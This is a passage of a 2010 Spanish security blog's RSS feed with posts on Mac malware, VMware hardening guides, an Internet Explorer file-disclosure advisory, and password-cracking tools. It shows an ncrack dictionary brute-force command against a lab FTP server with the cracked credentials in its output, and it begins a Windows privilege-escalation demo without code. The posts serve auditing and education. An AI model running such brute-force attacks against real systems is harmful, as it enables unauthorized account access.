&lt;/span&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: 'Lucida Grande', 'Lucida Grande', Verdana, Arial, sans-serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1226522460380785602-5193549353909631033?l=www.securecorner.net' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/TheSecureCorner/~4/_G6yoOOKJNo" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/TheSecureCorner/~3/_G6yoOOKJNo/cross-site-scripting-en-ficheros-flash.html</link><author>noreply@blogger.com (Ramon Vicens)</author><feedburner:origLink>http://www.securecorner.net/2010/02/cross-site-scripting-en-ficheros-flash.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1226522460380785602.post-5083534921199165311</guid><pubDate>Sun, 07 Feb 2010 07:06:00 +0000</pubDate><atom:updated>2010-02-07T08:06:00.352+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Otros</category><title>¿Está de moda el hacking?</title><description>Recientemente he encontrado un post en uno de los blogs que habitualmente sigo. De hecho es un artículo que merece mucho la pena su lectura, por ello, recomiendo que lo leais. El artículo es del blog&amp;nbsp;"&lt;i&gt;Apuntes de Seguridad de la Información&lt;/i&gt;" y se realiza una reflexión sobre los incidentes de seguridad que se han hecho públicos recientemente. Muy interesante!&lt;br /&gt;
&lt;br /&gt;
Sería interesante prestar atención al mensaje que intenta transmitir y a los links a los que el artículo enlaza.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://seguridad-de-la-informacion.blogspot.com/2010/02/esta-el-hacking-de-moda.html"&gt;Ver Artículo&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
Saludos,&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1226522460380785602-5083534921199165311?l=www.securecorner.net' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/TheSecureCorner/~4/LXzbBei07pA" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/TheSecureCorner/~3/LXzbBei07pA/esta-de-moda-el-hacking.html</link><author>noreply@blogger.com (Ramon Vicens)</author><thr:total>0</thr:total><feedburner:origLink>http://www.securecorner.net/2010/02/esta-de-moda-el-hacking.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1226522460380785602.post-5923240244718823144</guid><pubDate>Fri, 05 Feb 2010 16:05:00 +0000</pubDate><atom:updated>2010-02-05T17:05:09.588+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">MacOS Security</category><title>Apple vs Seguridad</title><description>&lt;div style="text-align: justify;"&gt;Hasta hace poco Windows siempre ha sido el foco de atención para todos los desarrolladores de software malicioso, o más comúnmente conocido como malware y todos sus subtipos virus, troyanos, worms (gusanos), etc... &amp;nbsp;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Lo que quiero remarcar para todos los usuarios de Mac, es si realmente son más seguros que un PC convencional con Windows. El éxito de Apple en sus diversos productos como iPhone, iPod, Macbooks y seguramente con su nuevo producto iPad ha hecho que muchos desarrolladores cambien la tendencia de escritura de malware. De hecho este pasado año ya vimos como aparecían nuevos ataques a la plataforma MacOS.&amp;nbsp;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Entonces me pregunto, ¿Es real la sensación de seguridad que tienen todos los usuarios de MacOS? Deberían los usuarios de mac salir de su estado de confianza para ponerse las pilas y estar algo más atentos al fraude electrónico alrededor de la plataforma de Apple?&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Dejo algunas referencias para reflexión propia:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;br /&gt;
&lt;ul&gt;&lt;li style="text-align: justify;"&gt;&lt;a href="http://blog.intego.com/images/yims2009.pdf"&gt;Blog Intego&lt;/a&gt;&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;a href="http://news.cnet.com/8301-27080_3-10444561-245.html"&gt;News CNET&lt;/a&gt;&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;a href="http://www.eset.com/threat-center/blog/2009/11/16/once-upon-a-cybercrime%E2%80%A6"&gt;ESET&lt;/a&gt;&amp;nbsp;&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;div style="text-align: justify;"&gt;Para todos aquellos afectados, proporciono un enlace a una guía de fortificación / hardening de plataformas Mac OS.&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li style="text-align: justify;"&gt;&lt;a href="http://www.apple.com/support/security/guides/"&gt;Mac OS Security Configuration Guides&lt;/a&gt;&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1226522460380785602-5923240244718823144?l=www.securecorner.net' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/TheSecureCorner/~4/gHswKjZ5X98" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/TheSecureCorner/~3/gHswKjZ5X98/apple-vs-seguridad.html</link><author>noreply@blogger.com (Ramon Vicens)</author><feedburner:origLink>http://www.securecorner.net/2010/02/apple-vs-seguridad.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1226522460380785602.post-8754793340731672570</guid><pubDate>Fri, 05 Feb 2010 15:42:00 +0000</pubDate><atom:updated>2010-02-05T16:42:06.824+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Políticas Seguridad</category><title>VMware publica una guías de securización de entornos virtualizados</title><description>Vmware ha publicado unas guías de securización de los entornos virtualizados vSphere v4.0. Según el &lt;a href="http://blogs.vmware.com/security/2010/01/announcing-vsphere-40-hardening-guide-public-draft-release.html"&gt;blog de VMware&lt;/a&gt;, &amp;nbsp;las guías se dividen en:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;Introducción&lt;/li&gt;
&lt;li&gt;Máquinas Virtuales&lt;/li&gt;
&lt;li&gt;Host&lt;/li&gt;
&lt;li&gt;vNetwork&lt;/li&gt;
&lt;li&gt;vCenter&lt;/li&gt;
&lt;li&gt;Console OS (ESX)&lt;/li&gt;
&lt;/ul&gt;&lt;div&gt;Aquí dejo el enlace a los &lt;a href="http://communities.vmware.com/community/vmtn/general/security?view=documents"&gt;documentos&lt;/a&gt;.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;Recordad, que además de securizar el entorno de virtualización, cabe recordar que se deberá aplicar una securización del sistema operativo de las máquinas virtuales. Para ello, también existen otras guías de &lt;a href="http://cisecurity.org/en-us/?route=downloads"&gt;CIS&lt;/a&gt;, &lt;a href="http://csrc.nist.gov/publications/PubsSPs.html"&gt;NIST&lt;/a&gt; y &lt;a href="http://www.nsa.gov/ia/guidance/security_configuration_guides/index.shtml"&gt;NSA&lt;/a&gt;.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;Saludos,&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1226522460380785602-8754793340731672570?l=www.securecorner.net' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/TheSecureCorner/~4/qUPaxZXA_VM" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/TheSecureCorner/~3/qUPaxZXA_VM/vmware-publica-una-guias-de.html</link><author>noreply@blogger.com (Ramon Vicens)</author><feedburner:origLink>http://www.securecorner.net/2010/02/vmware-publica-una-guias-de.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1226522460380785602.post-3165438578916307465</guid><pubDate>Fri, 05 Feb 2010 15:26:00 +0000</pubDate><atom:updated>2010-02-05T16:27:32.376+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Noticias</category><title>Nuevas vulnerabilidades para Internet Explorer</title><description>&lt;div style="text-align: justify;"&gt;Despúes de la vulnerabilidad crítica 'Aurora' que se detectó el pasado mes de Enero, a Internet Explorer, le han salido dos nuevas vulnerabilidades. Esta vez reportadas por los profesionales de &lt;a href="http://www.coresecurity.com/content/internet-explorer-dynamic-object-tag"&gt;Core Security&lt;/a&gt; el pasado 3 de Febrero.&amp;nbsp;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;La descripción de la vulnerabilidad pone lo siguiente:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;"&lt;span class="Apple-style-span" style="font-family: arial, verdana, geneva, sans-serif; font-size: 12px; line-height: 17px;"&gt;This advisory describes two vulnerabilities that provide access to any file stored in on a user's desktop system if it is running a vulnerable version of Internet Explorer. These vulnerabilities can be used in attacks combined with a number of insecure features of Internet Explorer to provide remote access to locally stored files without the need for any further action from the victim after visting a website controlled by the attacker. The vulnerabilities are simple variations of bugs disclosed previously in CoreLabs Security Advisories CORE-2008-0103&amp;nbsp;&lt;a href="http://www.coresecurity.com/content/internet-explorer-dynamic-object-tag#lref.1" style="color: #cc0000; font-family: arial, verdana, geneva, sans-serif; font-size: 12px; line-height: 17px; margin-bottom: 20px; margin-left: 0px; margin-right: 0px; margin-top: 0px; text-decoration: none;"&gt;[1]&lt;/a&gt;&amp;nbsp;and CORE-2008-0826&amp;nbsp;&lt;a href="http://www.coresecurity.com/content/internet-explorer-dynamic-object-tag#lref.2" style="color: #cc0000; font-family: arial, verdana, geneva, sans-serif; font-size: 12px; line-height: 17px; margin-bottom: 20px; margin-left: 0px; margin-right: 0px; margin-top: 0px; text-decoration: none;"&gt;[2]&lt;/a&gt;. Exploitation of these vulnerabilities requires enticing users to click on URLs otherwise visit a malicious website controlled by the attacker but no further user interaction is needed. As a result an attacker would gain the ability to read any file stored on the user's desktop system but will not be able to fully compromise it to execute arbitrary code without restrictions.&lt;span class="Apple-style-span" style="font-family: Times; font-size: medium; line-height: normal;"&gt;"&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Times, verdana, geneva, sans-serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Times, verdana, geneva, sans-serif;"&gt;Las versiones vulnerables reportadas por Core Security son:&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Times, verdana, geneva, sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-family: arial, verdana, geneva, sans-serif; font-size: 12px; line-height: 17px;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Times, verdana, geneva, sans-serif;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Times, verdana, geneva, sans-serif;"&gt;&lt;ul style="margin-bottom: 20px;"&gt;&lt;li&gt;&lt;span class="Apple-style-span" style="font-family: Times, verdana, geneva, sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: medium; line-height: normal;"&gt;&lt;span class="Apple-style-span" style="color: #444444; font-family: arial, verdana, geneva, sans-serif; line-height: 17px;"&gt;Internet Explorer 5.01 SP4 on Windows 2000 sp4&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class="Apple-style-span" style="font-family: Times, verdana, geneva, sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: medium; line-height: normal;"&gt;&lt;span class="Apple-style-span" style="color: #444444; font-family: arial, verdana, geneva, sans-serif; line-height: 17px;"&gt;Internet Explorer 6sp1 on Windows 2000 sp4&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class="Apple-style-span" style="font-family: Times, verdana, geneva, sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: medium; line-height: normal;"&gt;&lt;span class="Apple-style-span" style="color: #444444; font-family: arial, verdana, geneva, sans-serif; line-height: 17px;"&gt;Internet Explorer 6sp2 on Windows XP sp2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class="Apple-style-span" style="font-family: Times, verdana, geneva, sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: medium; line-height: normal;"&gt;&lt;span class="Apple-style-span" style="color: #444444; font-family: arial, verdana, geneva, sans-serif; line-height: 17px;"&gt;Internet Explorer 6sp2 on Windows XP sp3&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class="Apple-style-span" style="font-family: Times, verdana, geneva, sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: medium; line-height: normal;"&gt;&lt;span class="Apple-style-span" style="color: #444444; font-family: arial, verdana, geneva, sans-serif; line-height: 17px;"&gt;Internet Explorer 7 on Windows XP sp2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class="Apple-style-span" style="font-family: Times, verdana, geneva, sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: medium; line-height: normal;"&gt;&lt;span class="Apple-style-span" style="color: #444444; font-family: arial, verdana, geneva, sans-serif; line-height: 17px;"&gt;Internet Explorer 7 on Windows XP sp3&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class="Apple-style-span" style="font-family: Times, verdana, geneva, sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: medium; line-height: normal;"&gt;&lt;span class="Apple-style-span" style="color: #444444; font-family: arial, verdana, geneva, sans-serif; line-height: 17px;"&gt;Internet Explorer 7 on Windows Vista sp1&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class="Apple-style-span" style="font-family: Times, verdana, geneva, sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: medium; line-height: normal;"&gt;&lt;span class="Apple-style-span" style="color: #444444; font-family: arial, verdana, geneva, sans-serif; line-height: 17px;"&gt;Internet Explorer 7 on Windows Vista sp2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class="Apple-style-span" style="font-family: Times, verdana, geneva, sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: medium; line-height: normal;"&gt;&lt;span class="Apple-style-span" style="color: #444444; font-family: arial, verdana, geneva, sans-serif; line-height: 17px;"&gt;Internet Explorer 7 on Windows Server 2003 sp2 if Protected Mode if OFF and not using Enhanced Security Configuration&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class="Apple-style-span" style="font-family: Times, verdana, geneva, sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: medium; line-height: normal;"&gt;&lt;span class="Apple-style-span" style="color: #444444; font-family: arial, verdana, geneva, sans-serif; line-height: 17px;"&gt;Internet Explorer 7 on Windows Server 2008 if Protected Mode if OFF and not using Enhanced Security Configuration&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class="Apple-style-span" style="font-family: Times, verdana, geneva, sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: medium; line-height: normal;"&gt;&lt;span class="Apple-style-span" style="color: #444444; font-family: arial, verdana, geneva, sans-serif; line-height: 17px;"&gt;Internet Explorer 8 on Windows XP sp2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class="Apple-style-span" style="font-family: Times, verdana, geneva, sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: medium; line-height: normal;"&gt;&lt;span class="Apple-style-span" style="color: #444444; font-family: arial, verdana, geneva, sans-serif; line-height: 17px;"&gt;Internet Explorer 8 on Windows XP sp3&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class="Apple-style-span" style="font-family: Times, verdana, geneva, sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: medium; line-height: normal;"&gt;&lt;span class="Apple-style-span" style="color: #444444; font-family: arial, verdana, geneva, sans-serif; line-height: 17px;"&gt;Internet Explorer 8 on Windows Vista sp1 if Protected Mode if OFF&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class="Apple-style-span" style="font-family: Times, verdana, geneva, sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: medium; line-height: normal;"&gt;&lt;span class="Apple-style-span" style="color: #444444; font-family: arial, verdana, geneva, sans-serif; line-height: 17px;"&gt;Internet Explorer 8 on Windows Vista sp2 if Protected Mode is OFF&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class="Apple-style-span" style="font-family: Times, verdana, geneva, sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: medium; line-height: normal;"&gt;&lt;span class="Apple-style-span" style="color: #444444; font-family: arial, verdana, geneva, sans-serif; line-height: 17px;"&gt;Internet Explorer 8 on Windows 7 if Protected Mode if OFF&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class="Apple-style-span" style="font-family: Times, verdana, geneva, sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: medium; line-height: normal;"&gt;&lt;span class="Apple-style-span" style="color: #444444; font-family: arial, verdana, geneva, sans-serif; line-height: 17px;"&gt;Internet Explorer 8 on Windows Server 2003 sp2 if Protected Mode if OFF and not using Enhanced Security Configuration&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class="Apple-style-span" style="font-family: Times, verdana, geneva, sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: medium; line-height: normal;"&gt;&lt;span class="Apple-style-span" style="color: #444444; font-family: arial, verdana, geneva, sans-serif; line-height: 17px;"&gt;Internet Explorer 8 on Windows Server 2008 R2 if Protected Mode if OFF and not using Enhanced Security Configuration&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: #444444;"&gt;&lt;span class="Apple-style-span" style="font-size: medium;"&gt;Os dejo la publicación del &lt;a href="http://blogs.technet.com/msrc/archive/2010/02/03/security-advisory-980088-released.aspx"&gt;Advisory de Microsoft&lt;/a&gt;. Para todos aquellos afectados, desde mi punto de vista es que activen el "Protected Mode" en caso de usar Windows Vista / 7 / 2008 y en el caso de XP esperar a obtener un parche de Microsoft. Por ello, como se recomendó para el caso de la vulnerabilidad 'Aurora', la solución temporal puede pasar por utilizar un navegador alternativo.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: #444444;"&gt;&lt;span class="Apple-style-span" style="font-size: medium;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: #444444;"&gt;&lt;span class="Apple-style-span" style="font-size: medium;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: #444444;"&gt;&lt;span class="Apple-style-span" style="font-size: medium;"&gt;Saludos,&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: #444444;"&gt;&lt;span class="Apple-style-span" style="font-size: medium;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: #444444;"&gt;&lt;span class="Apple-style-span" style="font-size: medium;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1226522460380785602-3165438578916307465?l=www.securecorner.net' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/TheSecureCorner/~4/4HXTPCWmhcw" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/TheSecureCorner/~3/4HXTPCWmhcw/nuevas-vulnerabilidades-para-internet.html</link><author>noreply@blogger.com (Ramon Vicens)</author><feedburner:origLink>http://www.securecorner.net/2010/02/nuevas-vulnerabilidades-para-internet.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1226522460380785602.post-2217306629518905070</guid><pubDate>Thu, 04 Feb 2010 14:01:00 +0000</pubDate><atom:updated>2010-02-04T15:01:21.076+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Auditorías Seguridad</category><title>Nuevas Herramientas "Password Cracking"</title><description>&lt;div style="text-align: justify;"&gt;Me gustaría presentar dos nuevas herramientas para Cracking de contraseñas que tienen buena pinta aunque en la actualidad se encuentran en fase de desarrollo y mejora. Son dos herramientas con un mismo objetivo, pero con conceptos de funcionamiento distintos.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Una de ellas, &lt;a href="http://nmap.org/ncrack/"&gt;ncrack&lt;/a&gt;, es una herramienta de ataque a contraseñas en modo online, es decir, con ella y un diccionario de usuarios y contraseñas, se podrá atacar y por lo tanto, verificar la fortaleza de los mecanismos de autenticación de diversos protocolos como ftp, ssh, http, telnet .... &amp;nbsp;Podríamos decir que es una herramienta similar a hydra, medusa, brutessh que todavía está en fase alpha y por ello no soporta la misma cantidad de protocolos como las herramientas anteriormente citadas. La principal diferencia de las mismas con ncrack es que ésta permite ejecutarse contra varios equipos especificando rangos de IPs, con lo cual facilitará verificaciones masivas.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Veamos....&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-style: italic;"&gt;ncrack -v -v -U usr.txt -P passwd.txt ftp://172.16.139.128:21&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;Starting Ncrack 0.01ALPHA ( http://ncrack.org ) at 2010-02-04 11:09 UTC&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;Discovered credentials for ftp on 172.16.139.128 21/tcp:&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;172.16.139.128 21/tcp ftp: &lt;b&gt;ftp ftp&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;Ncrack done: 1 service scanned in 207.07 seconds.&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;Probes sent: 14 | timed-out: 2 | prematurely-closed: 0&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;i&gt;Ncrack finished.&lt;/i&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;La otra &lt;a href="http://sites.google.com/site/reusablesec/Home/password-cracking-tools/probablistic_cracker"&gt;herramienta&lt;/a&gt; que quería citar es una herramienta desarrollada por &lt;a href="http://www.blogger.com/goog_1265280912445"&gt;&amp;nbsp;&lt;/a&gt;&lt;span class="Apple-style-span" style="color: #d6d6d6; font-family: Verdana,'Lucida Grande',Arial,sans-serif; font-size: 12px; line-height: 21px;"&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;&lt;a href="http://reusablesec.blogspot.com/"&gt;Matt Weir&amp;nbsp;&lt;/a&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: black; font-family: Times; font-size: medium; line-height: normal;"&gt;&amp;nbsp;que actua en modo offline, es decir, a partir de un fichero de contraseñas como pueden ser entre otras John the Ripper, Lophtcrack, ... La principal diferencia es que la nueva herramienta, permite realizar un ataque al fichero de contraseñas en base a un estudio probabilístico. Se parte de un diccionario de palabras que se van a priorizar probabilísicamente con el objetivo de acelerar el ataque. &lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1226522460380785602-2217306629518905070?l=www.securecorner.net' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/TheSecureCorner/~4/DGvMRCftSM4" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/TheSecureCorner/~3/DGvMRCftSM4/nuevas-herramientas-password-cracking.html</link><author>noreply@blogger.com (Ramon Vicens)</author><feedburner:origLink>http://www.securecorner.net/2010/02/nuevas-herramientas-password-cracking.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1226522460380785602.post-4488781574357076600</guid><pubDate>Wed, 03 Feb 2010 10:44:00 +0000</pubDate><atom:updated>2010-02-03T12:16:38.151+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Auditorías Seguridad</category><title>Escalando privilegios en Windows</title><description>&lt;div style="text-align: justify;"&gt;Hace unos días desde Hispasec, anunciaban la existencia de una &lt;a href="http://www.hispasec.com/unaaldia/4106"&gt;nueva vulnerabilidad&lt;/a&gt;&amp;nbsp;en equipos windows &amp;nbsp;que en el caso de ser explotada, permite elevar privilegios de usuario a SYSTEM. Las plataformas afectadas parece que son desde NT, 2000, 2003, 2008, XP, Vista y Windows 7 a causa de un fallo de diseño de las arquitecturas de 32 bits.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Para simplificar el caso, obviaré toda la parte de ejecutar el exploit remoto, obtener privilegios de usuario en el sistema y luego subir el exploit a la máquina para escalar los privilegios. Entonces directamente, voy a crear un usuario con permisos de usuario sobre una máquina virtual Windows XP SP2. Subo el exploit y veamos ...&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;Antes ....&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_cF66r39b8uc/S2lR7oP3JlI/AAAAAAAAAE4/uVjA_-yem08/s1600-h/Picture+1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/_cF66r39b8uc/S2lR7oP3JlI/AAAAAAAAAE4/uVjA_-yem08/s320/Picture+1.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;y después ....&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_cF66r39b8uc/S2lSJuM2TEI/AAAAAAAAAFA/zHFyZhCcWnE/s1600-h/Picture+3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/_cF66r39b8uc/S2lSJuM2TEI/AAAAAAAAAFA/zHFyZhCcWnE/s320/Picture+3.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;
